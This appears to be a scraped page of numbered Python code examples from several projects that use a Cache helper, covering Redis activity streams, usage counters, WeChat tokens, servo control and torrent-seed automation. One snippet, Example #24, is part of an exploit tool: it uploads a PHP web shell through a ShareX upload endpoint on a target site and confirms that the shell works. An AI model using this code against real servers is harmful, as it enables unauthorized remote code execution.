Пример #1
0
    def query(self, account_id, limit=21):
        """ query for last 20 records of activity lists"""

        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])
        list_key = 'activity_stream::%s' % str(account_id)
        activity_keys = c.lrange(str(list_key), 0, limit)
        r = redis.Redis(host=settings.REDIS_READER_HOST,
                        port=settings.REDIS_PORT,
                        db=settings.CACHE_DATABASES['activity_resources'])
        pipeline = r.pipeline()

        for key in activity_keys:
            pipeline.hgetall(key)
        activities = []
        users = {}  # avoid duplicated sql queries
        for h in pipeline.execute():
            user_id = h.get('user_id', None)
            if user_id:
                if not users.get(user_id, None):
                    user = User.objects.get(pk=user_id)
                    users[user_id] = user
                else:
                    user = users[user_id]
                h['user_nick'] = user.nick
                h['user_email'] = user.email
                h['user_name'] = user.name

                activities.append(h)

        # if settings.DEBUG: logger.info('Returned activities %s' % str(activities))
        return activities
Пример #2
0
class Token:
    TOKEN_KEY = "wechat_token_key"
    URL_TEMPLATE = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}"
    RESPONSE_KEY = "access_token"
    EXPIRE_KEY = "expires_in"

    cache = None

    def __init__(self):
        self.cache = Cache()

    def fetch(self):
        access_token = self.cache.get(self.TOKEN_KEY)
        if access_token is None or len(access_token) == 0:
            print("Token has been expired, try fetching new one.")
            # refresh token
            response = HttpUtils.get(url=self.URL_TEMPLATE.format(
                Config.get("app_id"), Config.get("app_secret")),
                                     return_raw=True)
            if response is not None:
                resp_json = json.loads(str(response.text))
                access_token = resp_json[self.RESPONSE_KEY]
                expire_time = resp_json[self.EXPIRE_KEY]
                print("Fetch done, " + access_token)
                self.cache.set_with_expire(self.TOKEN_KEY, access_token,
                                           expire_time)

        return access_token
Пример #3
0
    def query(self, account_id, limit=-21):
        """ query for last 20 records of activity lists"""
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])
        list_key = 'activity_stream::%s' % str(account_id)
        activity_keys = c.lrange(str(list_key),limit,-1)
        r = redis.Redis(host='localhost', port=settings.REDIS_PORT,
            db=settings.CACHE_DATABASES['activity_resources'])
        pipeline=r.pipeline()

        for key in activity_keys:
            pipeline.hgetall(key)
        activities = []
        users = {} # avoid duplicated sql queries
        for h in pipeline.execute():
            user_id = h['user_id']
            if not users.get(user_id, None):
                user = User.objects.get(pk=user_id)
                users[user_id] = user
            else:
                user = users[user_id]
            h['user_nick'] = user.nick
            h['user_email'] = user.email
                
            activities.append(h)

        return activities
Пример #4
0
    def query(self, account_id, limit=21):
        """ query for last 20 records of activity lists"""
        if settings.DEBUG:
            logger.info("Query ActivityStreamDAO %d" % account_id)

        c = Cache(db=settings.CACHE_DATABASES["activity_resources"])
        list_key = "activity_stream::%s" % str(account_id)
        activity_keys = c.lrange(str(list_key), 0, limit)
        r = redis.Redis(
            host=settings.REDIS_READER_HOST, port=settings.REDIS_PORT, db=settings.CACHE_DATABASES["activity_resources"]
        )
        pipeline = r.pipeline()

        for key in activity_keys:
            pipeline.hgetall(key)
        activities = []
        users = {}  # avoid duplicated sql queries
        for h in pipeline.execute():
            user_id = h.get("user_id", None)
            if user_id:
                if not users.get(user_id, None):
                    user = User.objects.get(pk=user_id)
                    users[user_id] = user
                else:
                    user = users[user_id]
                h["user_nick"] = user.nick
                h["user_email"] = user.email
                h["user_name"] = user.name

                activities.append(h)

        # if settings.DEBUG: logger.info('Returned activities %s' % str(activities))
        return activities
Пример #5
0
    def control(vDelta=0.0, hDelta=0.0):
        Servo.initialize()
        if vDelta != 0:
            duty_cycle = float(Cache().get(Servo.V_DB_KEY))
            duty_cycle += vDelta
            if duty_cycle < 2.5 or duty_cycle > 12.5:
                return
            print(duty_cycle)
            Cache().set(Servo.V_DB_KEY, duty_cycle)
            Servo.vPin.ChangeDutyCycle(duty_cycle)
            time.sleep(0.02)
            Servo.vPin.ChangeDutyCycle(0)
            time.sleep(0.2)

        if hDelta != 0:
            duty_cycle = float(Cache().get(Servo.H_DB_KEY))
            duty_cycle += hDelta
            if duty_cycle < 2.5 or duty_cycle > 12.5:
                return
            print(duty_cycle)
            Cache().set(Servo.H_DB_KEY, duty_cycle)
            Servo.hPin.ChangeDutyCycle(duty_cycle)
            time.sleep(0.02)
            Servo.hPin.ChangeDutyCycle(0)
            time.sleep(0.2)
Пример #6
0
 def get_total_visualizations(self):
     c = Cache(db=0)
     total_visualizations = c.get('my_total_visualizations_' + str(self.id))
     if not total_visualizations:
         total_visualizations = Visualization.objects.filter(user=self.id).count()
         if total_visualizations > 0:
             c.set('my_total_visualizations_' + str(self.id), total_visualizations, settings.REDIS_STATS_TTL)
     return total_visualizations
Пример #7
0
 def get_total_visualizations(self):
     c = Cache(db=0)
     total_visualizations = c.get('my_total_visualizations_' + str(self.id))
     if not total_visualizations:
         total_visualizations = Visualization.objects.filter(user=self.id).count()
         if total_visualizations > 0:
             c.set('my_total_visualizations_' + str(self.id), total_visualizations, settings.REDIS_STATS_TTL)
     return total_visualizations
Пример #8
0
 def get_total_datastreams(self):
     c = Cache(db=0)
     total_datastreams = c.get('my_total_datastreams_' + str(self.id))
     if not total_datastreams:
         total_datastreams = DataStream.objects.filter(user=self.id).count()
         if total_datastreams > 0:
             c.set('my_total_datastreams_' + str(self.id), total_datastreams, settings.REDIS_STATS_TTL)
     return total_datastreams
Пример #9
0
 def get_total_datastreams(self):
     c = Cache(db=0)
     total_datastreams = c.get('my_total_datastreams_' + str(self.id))
     if not total_datastreams:
         total_datastreams = DataStream.objects.filter(user=self.id).count()
         if total_datastreams > 0:
             c.set('my_total_datastreams_' + str(self.id), total_datastreams, settings.REDIS_STATS_TTL)
     return total_datastreams
Пример #10
0
    def create(self, account_id, user_id, revision_id, resource_type,
               resource_id, action_id, resource_title, resource_category):
        """ Create a redis-hash and then addit to a redis-lits"""
        if settings.DEBUG:
            logger.info('Create ActivityStreamDAO %d %s' %
                        (action_id, resource_title))
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])

        timeformat = "%s %s %s %s" % (ugettext('APP-ON-TEXT'), "%Y-%m-%d,",
                                      ugettext('APP-AT-TEXT'), "%H:%M")
        now = datetime.datetime.now()
        time = now.strftime(timeformat)
        l_permalink = ""

        #TODO check and fix al urls.
        if int(action_id) != int(choices.ActionStreams.DELETE):
            if resource_type == settings.TYPE_DATASTREAM:
                l_permalink = reverse('manageDataviews.view',
                                      urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_VISUALIZATION:
                l_permalink = reverse('manageVisualizations.view',
                                      urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DATASET:
                l_permalink = reverse('manageDatasets.view',
                                      urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            else:
                for plugin in DatalPluginPoint.get_plugins():
                    if (plugin.is_active() and hasattr(plugin, 'doc_type')
                            and plugin.doc_type == resource_type
                            and hasattr(plugin, 'workspace_permalink')):
                        l_permalink = plugin.workspace_permalink(revision_id)

        list_key = 'activity_stream::%s' % str(account_id)
        n = c.incr(
            "%s_counter" % list_key
        )  # count any use of the list indexing hash and never repeat an ID
        activity_key = 'activity.stream_%s:%s' % (str(account_id), str(n))
        activity_value = {
            "user_id": user_id,
            "revision_id": revision_id,
            "type": resource_type,
            "resource_id": resource_id,
            "action_id": action_id,
            "title": resource_title,
            "time": time,
            "resource_link": l_permalink,
            "category": resource_category
        }

        r1 = c.hmset(activity_key, activity_value)
        r2 = c.lpush(str(list_key), activity_key)
        if settings.DEBUG:
            logger.info('Saved ActivityStreamDAO {} {} {} {} {}'.format(
                str(r1), str(r2), list_key, activity_key, activity_value))
        return list_key, activity_key, activity_value
Пример #11
0
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     return total_datasets
Пример #12
0
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         #if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     #else:
     #    if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Пример #13
0
 def get_total_datasets(self):
     c = Cache(db=0)
     users = User.objects.filter(account=self)
     total_datasets = c.get('account_total_datasets_' + str(self.id))
     if not total_datasets:
         total_datasets =  Dataset.objects.filter(user__in=users).count()
         if settings.DEBUG: logger.info('get_total_datasets from database %d' % total_datasets)
         if total_datasets > 0:
             c.set('account_total_datasets_' + str(self.id), total_datasets, settings.REDIS_STATS_TTL)
     else:
         if settings.DEBUG: logger.info('get_total_datasets from cache %s' % total_datasets)
         
     return total_datasets
Пример #14
0
    def ignore(self, seed_id=None):
        if seed_id is None:
            # ignore all seeds @ home page
            seeds = self.crawl()

            # skip if already in cache
            seeds = list(filter(lambda x: Cache().get(x.id) is None, seeds))

            for seed in seeds:
                print("Ignore seed: " + str(seed))
                Cache().set_with_expire(seed.id, str(seed), self.ttl)
        else:
            print("Ignore seed ID: " + str(seed_id))
            Cache().set_with_expire(seed_id, "", self.ttl)
Пример #15
0
def invoke(query, output=None):

    if not output:
        output = 'json'
        query['pOutput'] = output.upper()

    content_type = settings.CONTENT_TYPES.get(output)

    try:
        engine_domain = get_domain_with_protocol('engine')
        url = engine_domain + settings.END_POINT_SERVLET

        memcached = settings.MEMCACHED_ENGINE_END_POINT
        if memcached:
            engine_cache = memcache.Client(memcached, debug=0)
            if engine_cache:
                key = str(hash(frozenset(sorted(query.items()))))
                value = engine_cache.get(key)
                if value is None:
                    value, content_type = _request(query, url)
                    engine_cache.set(key, value, settings.MEMCACHED_DEFAULT_TTL)
                    return value, content_type
                else:
                    return value, content_type
            else:
                logger = logging.getLogger(__name__)
                logger.debug('No memcached client could be created. Dataview will be retrieved from engine.')

        return _request(query, url)

    except Exception, e:
        """ TOO much logging from here
        logger = logging.getLogger(__name__)
        logger.debug('{0}. Dataview will be retrieved from redis '.format(str(e)))
        """

        if output == 'json':
            if 'pFilter0' not in query:

                dataviews_cache = Cache(db=settings.CACHE_DATABASES['dataviews'])
                key = str(query.get('pId'))
                params = [ query[arg].decode('utf-8') for arg in sorted(query.keys()) if arg.startswith('pArgument')]
                if params:
                    key += u'::' + u':'.join(params)

                return dataviews_cache.get(key), content_type

        return None, content_type
Пример #16
0
    def monitor(self):
        data = self.generate_data()
        now = datetime.datetime.now()
        Cache().append(self.get_bucket(), now.strftime('%y%m%d-%H:%M:%S') + self.DELIMITER + str(data))

        # if data is below/above threshold, send alert
        self.alert(data)
Пример #17
0
    def check_and_notify(animation_id):
        bucket_name = ShuHuiWatchDog.BUCKET_NAME_PREFIX + str(animation_id)
        previous_chapter_num = Cache().get(bucket_name)
        if previous_chapter_num is None:
            previous_chapter_num = -1
        else:
            previous_chapter_num = int(previous_chapter_num)
        comic_name, current_chapter_num = ShuHuiWatchDog.get_max_chapter_num(
            animation_id)

        if current_chapter_num == ShuHuiWatchDog.INVALID_CHAPTER_NUM:
            EmailSender.send("错误:鼠绘-" + comic_name, "无法抓取最新章节号")
        elif current_chapter_num > previous_chapter_num:
            EmailSender.send("鼠绘-{0}更新啦".format(comic_name),
                             "最新章节号是" + str(current_chapter_num))
            Cache().set(bucket_name, current_chapter_num)
Пример #18
0
    def filter(self, data):
        # common strategy
        # 1. hasn't been found before
        # 2. not exceed max size
        max_size = Config.get("seed_max_size_mb")
        data = list(
            filter(lambda x: x.size < max_size and Cache().get(x.id) is None,
                   data))

        # customized strategy
        final_seeds = []
        if Config.get("mteam_strategy") == "easy":
            final_seeds = self.easy_strategy(data)
        elif Config.get("mteam_strategy") == "medium":
            final_seeds = self.medium_strategy(data)
        elif Config.get("mteam_strategy") == "hard":
            final_seeds = self.hard_strategy(data)

        # white list
        white_lists = Config.get("putao_white_list").split("|")
        for seed in data:
            for white_list in white_lists:
                if re.search(white_list, seed.title):
                    final_seeds.append(seed)
                    break

        for seed in final_seeds:
            print("Find valuable seed: " + str(seed))

        return final_seeds
Пример #19
0
 def latest(self):
     res = dict()
     for single in Cache().get_by_range(self.get_bucket(), start=0, end=0):
         item = single.split(self.DELIMITER)
         res['title'] = item[0]
         res['data'] = float(item[1])
         break
     return res
Пример #20
0
    def _get_names_for_unnamed_stops(self):
        """Intelligently guess stop names for unnamed stops by sourrounding
        street names and amenities.

        Caches stops with newly guessed names.

        """
        # Loop through all stops
        for stop in self.stops.values():

            # If there is no name, query one intelligently from OSM
            if stop.name == "[" + self.stop_no_name + "]":
                self._find_best_name_for_unnamed_stop(stop)
                print stop

                # Cache stops with newly created stop names
                Cache.write_data('stops-' + self.selector, self.stops)
Пример #21
0
    def add_seed(self, seed_id):
        self.login_if_not()

        self.download_seed_file(seed_id)
        seeds = list(filter(lambda x: x.id == seed_id, self.crawl(False)))
        assert len(seeds) == 1

        SeedManager.try_add_seeds(seeds)
        Cache().set_with_expire(seeds[0].id, str(seeds[0]), 5 * 864000)
Пример #22
0
 def __init__(self, visualization):
     self.visualization = visualization
     if isinstance(self.visualization, dict):
         self.visualization_id = self.visualization['visualization_id']
     else:
         self.visualization_id = self.visualization.visualization_id
     self.search_index = ElasticsearchIndex()
     self.logger = logging.getLogger(__name__)
     self.cache = Cache()
Пример #23
0
 def __init__(self, datastream):
     self.datastream = datastream
     if isinstance(self.datastream, dict):
         self.datastream_id = self.datastream['datastream_id']
     else:
         self.datastream_id = self.datastream.id
     #self.datastream_revision = datastream.last_published_revision
     self.search_index = ElasticsearchIndex()
     self.cache = Cache()
Пример #24
0
    def upload_shell(upload_url, form_name, secret, field_name, verbose,
                     cache_enabled):
        """ Upload shell to target site """
        res = ShareX.upload(upload_url,
                            io.BytesIO(Shell.PAYLOAD.encode()),
                            file_name=Exploit.MAGIC,
                            form_name=form_name,
                            secret=secret,
                            field_name=field_name)

        res_code = res.status_code
        res_body = res.text.strip()

        if res.status_code != 200:
            if res_code == 403:
                Logger.error('target blocked file upload. waf?')

            elif res_code == 404:
                Logger.error('file upload endpoint not found')

            else:
                Logger.error('unknown response code')

        for error in ShareX.Errors:
            if error.value['content'].lower() in res_body.lower():
                reason = error.value['reason'].lower()
                Logger.error(f'failed to upload shell: \x1b[95m{reason}')

        shell_url = Exploit.get_shell_url(res_body, upload_url)

        if not Exploit.check(shell_url):
            Logger.error('target does not appear vulnerable')

        Logger.success('php web shell uploaded')

        if verbose:
            Logger.info(f'location: \x1b[95m{shell_url}')

        if cache_enabled:
            Cache.save(upload_url, shell_url)
            Logger.success('results saved to cache')

        return shell_url
Пример #25
0
    def action(self, data):
        if len(data) == 0:
            return

        # send email
        for seed in data:
            EmailSender.send(u"种子", str(seed))
            Cache().set_with_expire(seed.id, str(seed), 864000)

        SeedManager.try_add_seeds(data)
Пример #26
0
    def create(self, account_id, user_id, revision_id, resource_type, resource_id, action_id, resource_title, resource_category):
        """ Create a redis-hash and then addit to a redis-lits"""
        if settings.DEBUG: logger.info('Create ActivityStreamDAO %d %s' % (action_id, resource_title))
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])

        timeformat = "%s %s %s %s" % (ugettext('APP-ON-TEXT'), "%Y-%m-%d,", ugettext('APP-AT-TEXT'), "%H:%M")
        now = datetime.datetime.now()
        time = now.strftime(timeformat)
        l_permalink=""

        #TODO check and fix al urls.
        if int(action_id) != int(choices.ActionStreams.DELETE):
            if resource_type == settings.TYPE_DATASTREAM:
                l_permalink = reverse('manageDataviews.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_VISUALIZATION:
                l_permalink = reverse('manageVisualizations.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DATASET:
                l_permalink = reverse('manageDatasets.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            else:
                for plugin in DatalPluginPoint.get_plugins():
                    if (plugin.is_active() and hasattr(plugin, 'doc_type') and 
                        plugin.doc_type == resource_type and 
                        hasattr(plugin, 'workspace_permalink')):
                        l_permalink = plugin.workspace_permalink(revision_id)
            
        list_key = 'activity_stream::%s' % str(account_id)
        n=c.incr("%s_counter" % list_key) # count any use of the list indexing hash and never repeat an ID
        activity_key = 'activity.stream_%s:%s' % (str(account_id), str(n))
        activity_value = {"user_id": user_id, "revision_id": revision_id
                        , "type": resource_type, "resource_id": resource_id
                        ,"action_id": action_id
                        , "title": resource_title, "time":time
                        , "resource_link": l_permalink
                        , "category": resource_category }

        r1 = c.hmset(activity_key, activity_value)
        r2 = c.lpush(str(list_key), activity_key)
        if settings.DEBUG: logger.info('Saved ActivityStreamDAO {} {} {} {} {}'.format(str(r1), str(r2), list_key, activity_key, activity_value))
        return list_key, activity_key, activity_value
Пример #27
0
    def stat(self, unit="GB", update_cache=True):
        self.login_if_not()

        soup_obj = HttpUtils.get(self.site.stat_page,
                                 headers=self.site.login_headers)
        assert soup_obj is not None

        div_list = soup_obj.select(
            "table.mainouter tr td table tr td div[align='center']")
        assert len(div_list) == 1

        content = div_list[0].contents[0]
        m = re.search(u"获取(\d+.\d+)个魔力", content)
        assert m
        mp = float(m.group(1))

        span_list = soup_obj.select("#usermsglink span")
        up = HttpUtils.pretty_format(span_list[1].contents[2], unit)
        down = HttpUtils.pretty_format(span_list[1].contents[4], unit)

        prev_up = Cache().get(self.get_site_name() + "_up")
        prev_down = Cache().get(self.get_site_name() + "_down")

        if prev_up is None:
            prev_up = 0
        else:
            prev_up = float(prev_up.decode())

        if prev_down is None:
            prev_down = 0
        else:
            prev_down = float(prev_down.decode())

        delta_up = round(up - prev_up, 2)
        delta_down = round(down - prev_down, 2)
        if delta_down == 0:
            delta_ratio = "Inf"
        else:
            delta_ratio = round(delta_up / delta_down, 2)

        current_upload = round(up - down, 2)
        print(
            "%s, mp=%s, up=%s, down=%s, current=%s, delta_up=%s, delta_down=%s, delta_ratio=%s"
            % (str(time.strftime("%Y-%m-%d %H:%M:%S")), mp, up, down,
               current_upload, delta_up, delta_down, delta_ratio))

        if update_cache:
            Cache().set(self.get_site_name() + "_up", up)
            Cache().set(self.get_site_name() + "_down", down)

        return mp, up, down
Пример #28
0
    def initialize():
        if Servo.hPin is None and Servo.vPin is None:
            if Cache().get(Servo.H_DB_KEY) is None:
                Cache().set(Servo.H_DB_KEY, 7.5)
            if Cache().get(Servo.V_DB_KEY) is None:
                Cache().set(Servo.V_DB_KEY, 7.5)

            try:
                # horizontal servo
                GPIO.setmode(GPIO.BCM)
                GPIO.setup(17, GPIO.OUT, initial=False)
                Servo.hPin = GPIO.PWM(17, 50)  # 50HZ
                Servo.hPin.start(0)
            except Exception as e:
                print(e)


            # vertical servo
            GPIO.setup(19, GPIO.OUT, initial=False)
            Servo.vPin = GPIO.PWM(19, 50)  # 50HZ
            Servo.vPin.start(0)
Пример #29
0
 def history(self):
     res = dict()
     data = list()
     title = list()
     for single in Cache().get_by_range(self.get_bucket(), start=0, end=self.LIMIT - 1):
         item = single.decode("utf-8").split(self.DELIMITER)
         title.append(item[0])
         data.append(float(item[1]))
     data.reverse()
     title.reverse()
     res['data'] = data
     res['title'] = title
     return res
Пример #30
0
    def action(self, candidate_seeds):
        if len(candidate_seeds) == 0:
            return

        for seed in candidate_seeds:
            self.download_seed_file(seed.id)

        success_seeds, fail_seeds = SeedManager.try_add_seeds(candidate_seeds)

        for success_seed in success_seeds:
            Cache().set_with_expire(success_seed.id, str(success_seed),
                                    5 * 864000)

        # make the failed seed cool down for some time
        for fail_seed in fail_seeds:
            cool_down_time = 3600  # 1 hour
            if fail_seed.free or fail_seed.sticky:
                cool_down_time = 300  # 5 minutes
            elif fail_seed.discount <= 50:
                cool_down_time = 1800  # 30 minutes

            Cache().set_with_expire(fail_seed.id, str(fail_seed),
                                    cool_down_time)
Пример #31
0
    def filter(self, data):
        # common strategy
        # 1. hasn't been found before
        # 2. not exceed max size
        max_size = Config.get("seed_max_size_mb")
        data = list(
            filter(lambda x: x.size < max_size and Cache().get(x.id) is None,
                   data))

        # choose customized strategy
        strategy_map = {
            "easy": self.easy_strategy,
            "medium": self.medium_strategy,
            "hard": self.hard_strategy,
            "hell": self.hell_strategy
        }
        strategy = strategy_map[Config.get(self.get_site_name() + "_strategy")]
        assert strategy is not None

        # execute customized strategy
        final_seeds = strategy(data)

        # white list
        white_lists_str = Config.get(self.get_site_name() + "_white_list")
        if white_lists_str is not None:
            white_lists = white_lists_str.split("|")
            for seed in data:
                for white_list in white_lists:
                    if re.search(white_list, seed.title):
                        final_seeds.append(seed)
                        break

        for seed in final_seeds:
            print("Find valuable seed: " + str(seed))

        return final_seeds
Пример #32
0
    def filter(self, data):
        # common strategy
        # 1. hasn't been found before
        # 2. not exceed max size
        max_size = Config.get("seed_max_size_mb")
        data = list(
            filter(lambda x: x.size < max_size and Cache().get(x.id) is None,
                   data))

        # sticky
        filtered_seeds = set(filter(lambda x: x.sticky, data))

        # white list
        white_lists = Config.get("putao_white_list").split("|")
        for seed in data:
            for white_list in white_lists:
                if re.search(white_list, seed.title):
                    filtered_seeds.add(seed)
                    break

        for seed in filtered_seeds:
            print("Add seed: " + str(seed))

        return filtered_seeds
Пример #33
0
    def create(self, account_id, user_id, revision_id, resource_type, resource_id, action_id, resource_title):
        """ Create a redis-hash and then addit to a redis-lits"""
        c = Cache(db=settings.CACHE_DATABASES['activity_resources'])

        timeformat = "%s %s %s %s" % (ugettext('APP-ON-TEXT'), "%B %d, %Y", ugettext('APP-AT-TEXT'), "%H:%M")
        now = datetime.datetime.now()
        time = now.strftime(timeformat)
        l_permalink=""

        #TODO check and fix al urls.
        if int(action_id) != int(choices.ActionStreams.DELETE):
            if resource_type == settings.TYPE_DATASTREAM:
                l_permalink = reverse('manageDataviews.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_VISUALIZATION:
                l_permalink = reverse('manageVisualizations.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DATASET:
                l_permalink = reverse('manageDatasets.view', urlconf='workspace.urls',
                                      kwargs={'revision_id': revision_id})
            elif resource_type == settings.TYPE_DASHBOARD:
                l_permalink = LocalHelper.build_permalink('dashboard_manager.action_view',
                                                          '&dashboard_revision_id=' + str(revision_id))

        list_key = 'activity_stream::%s' % str(account_id)
        n=c.incr("%s_counter" % list_key) # count any use of the list indexing hash and never repeat an ID
        activity_key = 'activity.stream_%s:%s' % (str(account_id), str(n))
        activity_value = {"user_id": user_id, "revision_id": revision_id
                        , "type": resource_type, "resource_id": resource_id
                        ,"action_id": action_id
                        , "title": resource_title, "time":time
                        , "resource_link": l_permalink }

        c.hmset(activity_key, activity_value)
        c.lpush(str(list_key), activity_key)
        return list_key, activity_key, activity_value
Пример #34
0
 def __init__(self, datastream):
     self.datastream = datastream
     #self.datastream_revision = datastream.last_published_revision
     self.search_index = ElasticsearchIndex()
     self.cache=Cache()
Пример #35
0
def workspace_open_data_metrics(auth_manager):
    from core.cache import Cache
    from datetime import date, timedelta
    from django.db import connection
    cursor = connection.cursor()

    user_id = auth_manager.id
    account_id = auth_manager.account_id
    language = auth_manager.language

    last_7_days = date.today() - timedelta(days=7)
    c = Cache(db=0)

    published_datasets = c.get('published_datasets_' + str(account_id))
    if not published_datasets:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datasets d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dataset_revisions b WHERE b.dataset_id = d.id AND NOT EXISTS(SELECT * FROM ao_dataset_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dataset_id = c.dataset_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datasets = row[0]
        c.set('published_datasets_' + str(account_id), published_datasets, settings.REDIS_STATS_TTL)

    total_datasets = c.get('total_datasets_' + str(account_id))
    if not total_datasets:
        total_datasets = Dataset.objects.filter(user__account=account_id).count()
        c.set('total_datasets_' + str(account_id), total_datasets, settings.REDIS_STATS_TTL)

    published_datastreams = c.get('published_datastreams_' + str(account_id))
    if not published_datastreams:
        cursor.execute("SELECT COUNT(1) as val FROM ao_datastreams d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_datastream_revisions b WHERE b.datastream_id = d.id AND NOT EXISTS(SELECT * FROM ao_datastream_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.datastream_id = c.datastream_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_datastreams = row[0]
        c.set('published_datastreams_' + str(account_id), published_datastreams, settings.REDIS_STATS_TTL)

    total_datastreams = c.get('total_datastreams_' + str(account_id))
    if not total_datastreams:
        total_datastreams = DataStream.objects.filter(user__account=account_id).count()
        c.set('total_datastreams_' + str(account_id), total_datastreams, settings.REDIS_STATS_TTL)

    published_dashboards = c.get('published_dashboards_' + str(account_id))
    if not published_dashboards:
        cursor.execute("SELECT COUNT(1) as val FROM ao_dashboards d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_dashboard_revisions b WHERE b.dashboard_id = d.id AND NOT EXISTS(SELECT * FROM ao_dashboard_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.dashboard_id = c.dashboard_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_dashboards = row[0]
        c.set('published_dashboards_' + str(account_id), published_dashboards, settings.REDIS_STATS_TTL)

    published_visualizations = c.get('published_visualizations_' + str(account_id))
    if not published_visualizations:
        cursor.execute("SELECT COUNT(1) as val FROM ao_visualizations d JOIN ao_users u ON u.id=d.user_id JOIN ao_accounts ac ON u.account_id=ac.id WHERE ac.id = %s and EXISTS(SELECT * FROM ao_visualizations_revisions b WHERE b.visualization_id = d.id AND NOT EXISTS(SELECT * FROM ao_visualizations_revisions c WHERE c.created_at > b.created_at AND c.status = 4 AND b.visualization_id = c.visualization_id) AND b.status = 3)", [str(account_id)])
        row = cursor.fetchone()
        published_visualizations = row[0]
        c.set('published_visualizations_' + str(account_id), published_visualizations, settings.REDIS_STATS_TTL)

    total_visualizations = c.get('total_visualizations_' + str(account_id))
    if not total_visualizations:
        total_visualizations = Visualization.objects.filter(user__account=account_id).count()
        c.set('total_visualizations_' + str(account_id), total_visualizations, settings.REDIS_STATS_TTL)

    return locals()
Пример #36
0
class DatastreamHitsDAO():
    """class for manage access to Hits in DB and index"""

    doc_type = "ds"
    from_cache = False

    # cache ttl, 1 hora
    TTL=3600 

    def __init__(self, datastream):
        self.datastream = datastream
        #self.datastream_revision = datastream.last_published_revision
        self.search_index = ElasticsearchIndex()
        self.logger=logging.getLogger(__name__)
        self.cache=Cache()

    def add(self,  channel_type):
        """agrega un hit al datastream. """

        # TODO: Fix temporal por el paso de DT a DAO.
        # Es problema es que por momentos el datastream viene de un queryset y otras veces de un DAO y son objetos
        # distintos
        try:
            datastream_id = self.datastream.datastream_id
        except:
            datastream_id = self.datastream['datastream_id']

        try:
            guid = self.datastream.guid
        except:
            guid = self.datastream['guid']

        try:
            hit=DataStreamHits.objects.create(datastream_id=datastream_id, channel_type=channel_type)
        except IntegrityError:
            # esta correcto esta excepcion?
            raise DataStreamNotFoundException()

        self.logger.info("DatastreamHitsDAO hit! (guid: %s)" % ( guid))

        # armo el documento para actualizar el index.
        doc={'docid':"DS::%s" % guid,
                "type": "ds",
                "script": "ctx._source.fields.hits+=1"}

        return self.search_index.update(doc)

    def count(self):
        return DataStreamHits.objects.filter(datastream_id=self.datastream['datastream_id']).count()

    def _get_cache(self, cache_key):

        cache=self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_days(self, day=30, channel_type=None):
        """trae un dict con los hits totales de los ultimos day y los hits particulares de los días desde day hasta today"""

        # no sé si es necesario esto
        if day < 1:
            return {}

        cache_key="%s_hits_%s_%s" % ( self.doc_type, self.datastream.guid, day)

        if channel_type:
            cache_key+="_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # me cachendié! no esta en la cache
        if not hits :
            # tenemos la fecha de inicio
            start_date=datetime.today()-timedelta(days=day)

            # tomamos solo la parte date
            truncate_date = connection.ops.date_trunc_sql('day', 'created_at')

            qs=DataStreamHits.objects.filter(datastream=self.datastream,created_at__gte=start_date)

            if channel_type:
                qs=qs.filter(channel_type=channel_type)

            hits=qs.extra(select={'_date': truncate_date, "fecha": 'DATE(created_at)'}).values("fecha").order_by("created_at").annotate(hits=Count("created_at"))

            control=[ date.today()-timedelta(days=x) for x in range(day-1,0,-1)]
            control.append(date.today())
            
            for i in hits:
                try:
                    control.remove(i['fecha'])
                except ValueError:
                    pass

            hits=list(hits)
                
            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k['fecha']) 

            # transformamos las fechas en isoformat
            hits=map(self._date_isoformat, hits)

            # lo dejamos, amablemente, en la cache!
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache=False
        else:
            hits=json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row['fecha']=row['fecha'].isoformat()
        return row
Пример #37
0
